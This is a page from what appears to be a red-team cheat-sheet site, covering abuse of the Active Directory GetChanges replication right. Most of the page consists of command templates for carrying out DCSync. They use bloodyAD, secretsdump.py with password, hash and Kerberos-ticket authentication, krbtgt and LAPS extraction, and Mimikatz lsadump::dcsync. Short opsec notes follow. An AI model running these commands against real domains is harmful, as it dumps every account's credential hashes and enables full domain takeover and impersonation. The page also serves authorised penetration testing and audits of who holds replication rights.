🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / GetChanges

GetChanges

Source principal holds the DS-Replication-Get-Changes extended right on the domain object. Alone this is not abuseable β€” requires GetChangesAll to perform DCSync.

Applies to: User/Group/Computer β†’ Domain

This edge is not exploitable alone. Combine with GetChangesAll β†’ enables DCSync. Combine with GetChangesInFilteredSet β†’ enables SyncLAPSPassword.

Linux Abuse

Verify current rights (confirm both GetChanges + GetChangesAll present)

bloodyAD -u <username> -p '<password>' -d <domain> --host <dc-ip> get object '<domain-dn>' \
  --attr nTSecurityDescriptor

If GetChangesAll is also held β€” perform DCSync

# Full domain dump
secretsdump.py -outputfile 'dcsync' -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>'

# Pass-the-Hash
secretsdump.py -outputfile 'dcsync' -hashes ':<ntlm-hash>' -dc-ip <dc-ip> '<domain>/<username>@<dc-ip>'

# Pass-the-Ticket
KRB5CCNAME=<ccache> secretsdump.py -k -no-pass -outputfile 'dcsync' -dc-ip <dc-ip> '<domain>/<username>@<dc-hostname>'

# Single user
secretsdump.py -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>' -just-dc-user krbtgt

If GetChangesInFilteredSet is also held β€” SyncLAPSPassword

# Sync LAPS password for a specific computer
secretsdump.py -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>' -just-dc-user '<target-computer>$'

Windows Abuse

If combined with GetChangesAll β€” Mimikatz DCSync

mimikatz # lsadump::dcsync /domain:<domain> /user:Administrator
mimikatz # lsadump::dcsync /domain:<domain> /user:krbtgt
mimikatz # lsadump::dcsync /domain:<domain> /all /csv

Invoke-Mimikatz

Invoke-Mimikatz -Command '"lsadump::dcsync /domain:<domain> /user:krbtgt"'

Check who else holds replication rights (to find additional paths)

$acl = (Get-Acl 'AD:\DC=<domain>,DC=<tld>').Access
$acl | Where-Object { $_.ObjectType -eq '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' } | Select IdentityReference

Opsec

  • GetChanges alone is harmless but its presence (combined with GetChangesAll) represents a critical misconfiguration
  • Event ID 4662 fires on the DC whenever replication rights are exercised
  • Enumerate other principals holding these rights to identify additional paths